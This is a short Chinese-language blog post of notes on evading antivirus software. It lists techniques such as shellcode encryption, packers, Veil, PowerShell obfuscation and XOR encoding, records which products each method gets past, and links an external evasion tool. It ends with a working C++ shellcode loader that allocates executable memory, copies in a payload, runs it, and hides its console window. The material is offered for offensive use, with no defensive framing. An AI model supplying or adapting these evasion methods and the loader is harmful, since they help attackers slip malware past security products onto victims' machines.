免杀笔记

免杀

1 shellcode加密

  • 通过python脚本加密,64位
  • 加一个c++加载器,通过mingw编译
  • 需要专门的解码工具,代码写的比较复杂(文件多),不容易移植
  • 经测试,可以过除卡巴外的杀软
  • 网址:https://github.com/ORCA666/EVA2

2 Pyinstall打包

  • 可免杀,但不能上线

3 加壳

  • UPX不行
  • ASP加壳可以过Avast,但不能过Symantic

4 veil + mingw-w64

5 powershell加密免杀

6 shellcode加载混淆

shellcode异或和加字节

7 dll免杀

8 go免杀

9 工具免杀

10 在线免杀平台

11 shellcode加载器

c++加载器

#include <Windows.h>
#include <stdio.h>
using namespace std;
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/INCREMENTAL:NO")

int main(int argc, char** argv) {
    unsigned char ShellCode[] = " ";
    void* exec = VirtualAlloc(0, sizeof ShellCode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(exec, ShellCode, sizeof ShellCode);
	((void(*)())exec)();
	return 0;
}

7 其它

posted @ 2022-10-05 08:35  z5onk0  阅读(76)  评论(0编辑  收藏  举报